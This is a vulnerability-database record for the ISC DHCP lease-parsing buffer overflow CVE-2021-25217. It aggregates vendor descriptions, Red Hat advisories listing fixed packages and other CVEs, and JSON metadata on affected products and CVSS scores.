
53 vulnerabilities found for dhcp by isc

VAR-202105-1325

Vulnerability from variot - Updated: 2026-04-10 22:10

In ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16, ISC DHCP 4.4.0 -> 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), the outcome of encountering the defect while reading a lease that will trigger it varies, according to:

  • the component being affected (i.e., dhclient or dhcpd)

  • whether the package was built as a 32-bit or 64-bit binary

  • whether the compiler flag -fstack-protection-strong was used when compiling

In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process.

In dhcpd, when run in DHCPv4 or DHCPv6 mode:

  • if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted.

  • if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted.

ISC DHCP, provided by ISC (Internet Systems Consortium), contains a buffer overflow vulnerability due to a discrepancy between the processing of optional information encapsulated within network packets and information stored on disk.

There is a discrepancy between the code that handles encapsulated option information in leases transmitted "on the wire" and the code which reads and parses lease information after it has been written to disk storage. The highest threat from this vulnerability is to data confidentiality and integrity as well as service availability. (CVE-2021-25217).

Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. Bugs fixed (https://bugzilla.redhat.com/):

  • 1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve

  • 1945703 - "Guest OS Info" availability in VMI describe is flaky

  • 1958816 - [2.6.z] KubeMacPool fails to start due to OOM likely caused by a high number of Pods running in the cluster

  • 1963275 - migration controller null pointer dereference

  • 1965099 - Live Migration double handoff to virt-handler causes connection failures

  • 1965181 - CDI importer doesn't report AwaitingVDDK like it used to

  • 1967086 - Cloning DataVolumes between namespaces fails while creating cdi-upload pod

  • 1967887 - [2.6.6] nmstate is not progressing on a node and not configuring vlan filtering that causes an outage for VMs

  • 1969756 - Windows VMs fail to start on air-gapped environments

  • 1970372 - Virt-handler fails to verify container-disk

  • 1973227 - segfault in virt-controller during pdb deletion

  • 1974084 - 2.6.6 containers

  • 1975212 - No Virtual Machine Templates Found [EDIT - all templates are marked as depracted]

  • 1975727 - [Regression][VMIO][Warm] The third precopy does not end in warm migration

  • 1977756 - [2.6.z] PVC keeps in pending when using hostpath-provisioner

  • 1982760 - [v2v] no kind VirtualMachine is registered for version "kubevirt.io/v1" i...

  • 1986989 - OpenShift Virtualization 2.6.z cannot be upgraded to 4.8.0 initially deployed starting with <= 4.8

  1. Summary:

Red Hat Advanced Cluster Management for Kubernetes 2.3.0 General Availability release images, which fix several bugs and security issues. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.3.0 images

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/

Security:

  • fastify-reply-from: crafted URL allows prefix scape of the proxied backend service (CVE-2021-21321)

  • fastify-http-proxy: crafted URL allows prefix scape of the proxied backend service (CVE-2021-21322)

  • nodejs-netmask: improper input validation of octal input data (CVE-2021-28918)

  • redis: Integer overflow via STRALGO LCS command (CVE-2021-29477)

  • redis: Integer overflow via COPY command for large intsets (CVE-2021-29478)

  • nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)

  • nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)

  • golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension (CVE-2020-28851)

  • golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag (CVE-2020-28852)

  • nodejs-ansi_up: XSS due to insufficient URL sanitization (CVE-2021-3377)

  • oras: zip-slip vulnerability via oras-pull (CVE-2021-21272)

  • redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms (CVE-2021-21309)

  • nodejs-lodash: command injection via template (CVE-2021-23337)

  • nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl() (CVE-2021-23362)

  • browserslist: parsing of invalid queries could result in Regular Expression Denial of Service (ReDoS) (CVE-2021-23364)

  • nodejs-postcss: Regular expression denial of service during source map parsing (CVE-2021-23368)

  • nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option (CVE-2021-23369)

  • nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js (CVE-2021-23382)

  • nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option (CVE-2021-23383)

  • openssl: integer overflow in CipherUpdate (CVE-2021-23840)

  • openssl: NULL pointer dereference in X509_issuer_and_serial_hash() (CVE-2021-23841)

  • nodejs-ua-parser-js: ReDoS via malicious User-Agent header (CVE-2021-27292)

  • grafana: snapshot feature allow an unauthenticated remote attacker to trigger a DoS via a remote API call (CVE-2021-27358)

  • nodejs-is-svg: ReDoS via malicious string (CVE-2021-28092)

  • nodejs-netmask: incorrectly parses an IP address that has octal integer with invalid character (CVE-2021-29418)

  • ulikunitz/xz: Infinite loop in readUvarint allows for denial of service (CVE-2021-29482)

  • normalize-url: ReDoS for data URLs (CVE-2021-33502)

  • nodejs-trim-newlines: ReDoS in .end() method (CVE-2021-33623)

  • nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)

  • html-parse-stringify: Regular Expression DoS (CVE-2021-23346)

  • openssl: incorrect SSLv2 rollback protection (CVE-2021-23839)

For more details about the security issues, including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE pages listed in the References section.

Bugs:

  • RFE Make the source code for the endpoint-metrics-operator public (BZ# 1913444)

  • cluster became offline after apiserver health check (BZ# 1942589)

Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):

  • 1913333 - CVE-2020-28851 golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension

  • 1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag

  • 1913444 - RFE Make the source code for the endpoint-metrics-operator public

  • 1921286 - CVE-2021-21272 oras: zip-slip vulnerability via oras-pull

  • 1927520 - RHACM 2.3.0 images

  • 1928937 - CVE-2021-23337 nodejs-lodash: command injection via template

  • 1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions

  • 1930294 - CVE-2021-23839 openssl: incorrect SSLv2 rollback protection

  • 1930310 - CVE-2021-23841 openssl: NULL pointer dereference in X509_issuer_and_serial_hash()

  • 1930324 - CVE-2021-23840 openssl: integer overflow in CipherUpdate

  • 1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms

  • 1936427 - CVE-2021-3377 nodejs-ansi_up: XSS due to insufficient URL sanitization

  • 1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string

  • 1940196 - View Resource YAML option shows 404 error when reviewing a Subscription for an application

  • 1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header

  • 1941024 - CVE-2021-27358 grafana: snapshot feature allow an unauthenticated remote attacker to trigger a DoS via a remote API call

  • 1941675 - CVE-2021-23346 html-parse-stringify: Regular Expression DoS

  • 1942178 - CVE-2021-21321 fastify-reply-from: crafted URL allows prefix scape of the proxied backend service

  • 1942182 - CVE-2021-21322 fastify-http-proxy: crafted URL allows prefix scape of the proxied backend service

  • 1942589 - cluster became offline after apiserver health check

  • 1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl()

  • 1944822 - CVE-2021-29418 nodejs-netmask: incorrectly parses an IP address that has octal integer with invalid character

  • 1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data

  • 1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service

  • 1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option

  • 1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing

  • 1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js

  • 1954368 - CVE-2021-29482 ulikunitz/xz: Infinite loop in readUvarint allows for denial of service

  • 1955619 - CVE-2021-23364 browserslist: parsing of invalid queries could result in Regular Expression Denial of Service (ReDoS)

  • 1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option

  • 1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe

  • 1957410 - CVE-2021-29477 redis: Integer overflow via STRALGO LCS command

  • 1957414 - CVE-2021-29478 redis: Integer overflow via COPY command for large intsets

  • 1964461 - CVE-2021-33502 normalize-url: ReDoS for data URLs

  • 1966615 - CVE-2021-33623 nodejs-trim-newlines: ReDoS in .end() method

  • 1968122 - clusterdeployment fails because hiveadmission sc does not have correct permissions

  • 1972703 - Subctl fails to join cluster, since it cannot auto-generate a valid cluster id

  • 1983131 - Defragmenting an etcd member doesn't reduce the DB size (7.5GB) on a setup with ~1000 spoke clusters

  1. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64


====================================================================
Red Hat Security Advisory

Synopsis: Important: dhcp security update
Advisory ID: RHSA-2021:2357-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2021:2357
Issue date: 2021-06-09
CVE Names: CVE-2021-25217
====================================================================

  1. Summary:

An update for dhcp is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

  3. Description:

The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. The dhcp packages provide a relay agent and ISC DHCP service required to enable and administer DHCP on a network.

Security Fix(es):

  • dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient (CVE-2021-25217)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

  4. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

  5. Bugs fixed (https://bugzilla.redhat.com/):

1963258 - CVE-2021-25217 dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient

  6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: dhcp-4.2.5-83.el7_9.1.src.rpm

x86_64: dhclient-4.2.5-83.el7_9.1.x86_64.rpm dhcp-common-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-libs-4.2.5-83.el7_9.1.i686.rpm dhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: dhcp-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-devel-4.2.5-83.el7_9.1.i686.rpm dhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: dhcp-4.2.5-83.el7_9.1.src.rpm

x86_64: dhclient-4.2.5-83.el7_9.1.x86_64.rpm dhcp-common-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-libs-4.2.5-83.el7_9.1.i686.rpm dhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: dhcp-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-devel-4.2.5-83.el7_9.1.i686.rpm dhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: dhcp-4.2.5-83.el7_9.1.src.rpm

ppc64: dhclient-4.2.5-83.el7_9.1.ppc64.rpm dhcp-4.2.5-83.el7_9.1.ppc64.rpm dhcp-common-4.2.5-83.el7_9.1.ppc64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.ppc.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.ppc64.rpm dhcp-libs-4.2.5-83.el7_9.1.ppc.rpm dhcp-libs-4.2.5-83.el7_9.1.ppc64.rpm

ppc64le: dhclient-4.2.5-83.el7_9.1.ppc64le.rpm dhcp-4.2.5-83.el7_9.1.ppc64le.rpm dhcp-common-4.2.5-83.el7_9.1.ppc64le.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.ppc64le.rpm dhcp-libs-4.2.5-83.el7_9.1.ppc64le.rpm

s390x: dhclient-4.2.5-83.el7_9.1.s390x.rpm dhcp-4.2.5-83.el7_9.1.s390x.rpm dhcp-common-4.2.5-83.el7_9.1.s390x.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.s390.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.s390x.rpm dhcp-libs-4.2.5-83.el7_9.1.s390.rpm dhcp-libs-4.2.5-83.el7_9.1.s390x.rpm

x86_64: dhclient-4.2.5-83.el7_9.1.x86_64.rpm dhcp-4.2.5-83.el7_9.1.x86_64.rpm dhcp-common-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-libs-4.2.5-83.el7_9.1.i686.rpm dhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: dhcp-debuginfo-4.2.5-83.el7_9.1.ppc.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.ppc64.rpm dhcp-devel-4.2.5-83.el7_9.1.ppc.rpm dhcp-devel-4.2.5-83.el7_9.1.ppc64.rpm

ppc64le: dhcp-debuginfo-4.2.5-83.el7_9.1.ppc64le.rpm dhcp-devel-4.2.5-83.el7_9.1.ppc64le.rpm

s390x: dhcp-debuginfo-4.2.5-83.el7_9.1.s390.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.s390x.rpm dhcp-devel-4.2.5-83.el7_9.1.s390.rpm dhcp-devel-4.2.5-83.el7_9.1.s390x.rpm

x86_64: dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-devel-4.2.5-83.el7_9.1.i686.rpm dhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: dhcp-4.2.5-83.el7_9.1.src.rpm

x86_64: dhclient-4.2.5-83.el7_9.1.x86_64.rpm dhcp-4.2.5-83.el7_9.1.x86_64.rpm dhcp-common-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-libs-4.2.5-83.el7_9.1.i686.rpm dhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64: dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-devel-4.2.5-83.el7_9.1.i686.rpm dhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  7. References:

https://access.redhat.com/security/cve/CVE-2021-25217

https://access.redhat.com/security/updates/classification/#important

  8. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc.

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "sinec ins",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1501",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.15.0"
      },
      {
        "_id": null,
        "model": "ontap select deploy administration utility",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1512",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.3.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1500",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.15.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox mx5000",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.3.0"
      },
      {
        "_id": null,
        "model": "solidfire \\\u0026 hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "isc",
        "version": "4.4.2"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1500",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.3.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1400",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.15.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx5000",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.3.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1510",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.3.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1511",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.3.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1501",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.3.0"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx5000",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.15.0"
      },
      {
        "_id": null,
        "model": "sinec ins",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1511",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.15.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox mx5000",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.15.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1536",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.15.0"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "isc",
        "version": "4.4.0"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "4.1-esv"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1512",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.15.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1510",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.15.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1524",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.15.0"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "isc",
        "version": "4.4.0  to  4.4.2"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": null,
        "trust": 0.8,
        "vendor": "isc",
        "version": null
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "isc",
        "version": "4.1-esv-r1  to  4.1-esv-r16"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "isc",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-001741"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25217"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163789"
      },
      {
        "db": "PACKETSTORM",
        "id": "163747"
      },
      {
        "db": "PACKETSTORM",
        "id": "163196"
      },
      {
        "db": "PACKETSTORM",
        "id": "163155"
      },
      {
        "db": "PACKETSTORM",
        "id": "163144"
      },
      {
        "db": "PACKETSTORM",
        "id": "163145"
      },
      {
        "db": "PACKETSTORM",
        "id": "163051"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2021-25217",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 6.5,
            "id": "CVE-2021-25217",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 1.1,
            "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.8,
            "id": "CVE-2021-25217",
            "impactScore": 4.0,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Adjacent Network",
            "author": "IPA",
            "availabilityImpact": "High",
            "baseScore": 7.4,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "JVNDB-2021-001741",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Adjacent Network",
            "author": "IPA",
            "availabilityImpact": "High",
            "baseScore": 6.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "JVNDB-2021-001741",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2021-25217",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "security-officer@isc.org",
            "id": "CVE-2021-25217",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "IPA",
            "id": "JVNDB-2021-001741",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "IPA",
            "id": "JVNDB-2021-001741",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202105-1759",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-25217",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-25217"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-1759"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-001741"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-001741"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25217"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25217"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "In ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16, ISC DHCP 4.4.0 -\u003e 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), The outcome of encountering the defect while reading a lease that will trigger it varies, according to: the component being affected (i.e., dhclient or dhcpd) whether the package was built as a 32-bit or 64-bit binary whether the compiler flag -fstack-protection-strong was used when compiling In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process. In dhcpd, when run in DHCPv4 or DHCPv6 mode: if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted. if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted. ISC (Internet Systems Consortium) Provided by ISC DHCP contains a buffer overflow vulnerability. ISC DHCP contains a buffer overflow vulnerability due to a discrepancy between the processing of optional information encapsulated within network packets and information stored on disk. 
There is a discrepancy between the code that handles encapsulated option information in leases transmitted \"on the wire\" and the code which reads and parses lease information after it has been written to disk storage. The highest threat from this vulnerability is to data confidentiality and integrity as well as service availability. (CVE-2021-25217). Description:\n\nOpenShift Virtualization is Red Hat\u0027s virtualization solution designed for\nRed Hat OpenShift Container Platform. Bugs fixed (https://bugzilla.redhat.com/):\n\n1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve\n1945703 - \"Guest OS Info\" availability in VMI describe is flaky\n1958816 - [2.6.z] KubeMacPool fails to start due to OOM likely caused by a high number of Pods running in the cluster\n1963275 - migration controller null pointer dereference\n1965099 - Live Migration double handoff to virt-handler causes connection failures\n1965181 - CDI importer doesn\u0027t report AwaitingVDDK like it used to\n1967086 - Cloning DataVolumes between namespaces fails while creating cdi-upload pod\n1967887 - [2.6.6] nmstate is not progressing on a node and not configuring vlan filtering that causes an outage for VMs\n1969756 - Windows VMs fail to start on air-gapped environments\n1970372 - Virt-handler fails to verify container-disk\n1973227 - segfault in virt-controller during pdb deletion\n1974084 - 2.6.6 containers\n1975212 - No Virtual Machine Templates Found [EDIT - all templates are marked as depracted]\n1975727 - [Regression][VMIO][Warm] The third precopy does not end in warm migration\n1977756 - [2.6.z] PVC keeps in pending when using hostpath-provisioner\n1982760 - [v2v] no kind VirtualMachine is registered for version \\\"kubevirt.io/v1\\\" i... \n1986989 - OpenShift Virtualization 2.6.z cannot be upgraded to 4.8.0 initially deployed starting with \u003c= 4.8\n\n5. 
Summary:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.0 General\nAvailability release images, which fix several bugs and security issues. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.0 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. See\nthe following Release Notes documentation, which will be updated shortly\nfor this release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana\ngement_for_kubernetes/2.3/html/release_notes/\n\nSecurity:\n\n* fastify-reply-from: crafted URL allows prefix scape of the proxied\nbackend service (CVE-2021-21321)\n\n* fastify-http-proxy: crafted URL allows prefix scape of the proxied\nbackend service (CVE-2021-21322)\n\n* 